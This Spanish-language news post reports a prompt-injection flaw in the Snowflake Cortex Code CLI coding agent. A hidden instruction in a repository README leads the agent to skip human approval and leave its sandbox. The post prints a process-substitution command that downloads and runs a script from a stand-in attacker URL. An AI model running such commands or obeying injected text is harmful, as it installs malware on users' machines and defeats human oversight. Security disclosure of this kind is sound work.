La vulnerabilidad de Snowflake Cortex Code CLI permitió la evasión del entorno de pruebas y la ejecución de malware
Detalles de la Vulnerabilidad
Snowflake Cortex Code CLI es un agente de codificación de línea de comandos que opera de manera similar a Claude Code y Codex de OpenAI, con integración incorporada para ejecutar SQL en Snowflake. Dos días después del lanzamiento, se identificó una vulnerabilidad en el sistema de validación de comandos de Cortex Code que permitía que comandos maliciosos especialmente construidos ejecutaran comandos arbitrarios sin activar los pasos de aprobación con intervención humana y ejecutar esos comandos fuera del entorno aislado de Cortex CLI.
Cadena de Ataque
El ataque funciona mediante inyección de comandos indirecta. Un usuario abre Cortex y activa el entorno aislado, luego le pide a Cortex ayuda con un código de fuente abierta de terceros. Una inyección de comandos oculta en el README de un repositorio no confiable manipula a Cortex para que crea que debe ejecutar un comando peligroso.
Cortex no logró validar comandos dentro de expresiones de sustitución de procesos, permitiendo la ejecución no aprobada del comando malicioso:
cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))Este comando descarga un script desde el servidor de un atacante y lo ejecuta. La omisión funcionó porque:
- Los comandos inseguros dentro de una expresión de sustitución de procesos <() no fueron evaluados por el sistema de validación
- El comando completo comenzaba con un comando 'seguro' (cat en este caso)
- Los comandos en expresiones de sustitución de procesos nunca activaban la aprobación humana
Omisión del Entorno Aislado
La inyección de comandos también manipula el modelo para establecer una bandera que activa la ejecución de comandos fuera del entorno aislado. Cortex, por defecto, puede establecer una bandera para activar la ejecución de comandos fuera del entorno aislado, y la inyección utiliza esto para permitir que el comando malicioso se ejecute fuera del entorno aislado.
Remediación
El equipo de seguridad de Snowflake validó y remedió esta vulnerabilidad, lanzando una corrección con Cortex Code CLI versión 1.0.25 el 28 de febrero de 2026. El aviso completo de Snowflake está disponible dentro del Sitio de la Comunidad de Snowflake en: https://community.snowflake.com/s/article/PromptArmor-Report---Snowflake-Response
Nota: Esta cadena de ataque también se aplicaba a usuarios sin entorno aislado. La documentación indica que en modo OS+Regular, todos los comandos solicitan aprobación del usuario. Los comandos ejecutados en el entorno aislado también tienen restricciones de acceso a red y archivos.
📖 Lea la fuente completa: HN AI Agents
👀 Ver también
Claude Code continúa registrando sesiones después de la revocación, usuarios reportan silencio de soporte de 2 semanas
Un usuario de Claude Code informa que los registros de sesión continuaron apareciendo después de revocar el acceso, con el soporte de Anthropic sin respuesta durante dos semanas. Los registros incluían alcances como user:file_upload, user:ccr_inference y user:sessions:claude_code.
De la Granja al Código: Cómo un Agricultor Creó una Defensa de Tiempo de Ejecución de Código Abierto para OpenClaw
Descubre cómo un agricultor, sin experiencia previa en desarrollo, creó una defensa de tiempo de ejecución de código abierto para OpenClaw utilizando múltiples agentes de codificación de IA en solo 12 horas.
La vulnerabilidad de GitHub Copilot CLI permite la ejecución de malware mediante inyección de comandos.
Una vulnerabilidad en GitHub Copilot CLI permite la ejecución arbitraria de comandos de shell mediante inyección indirecta de prompts sin aprobación del usuario. Los atacantes pueden crear comandos que evaden la validación y ejecutan malware inmediatamente en la computadora de la víctima.
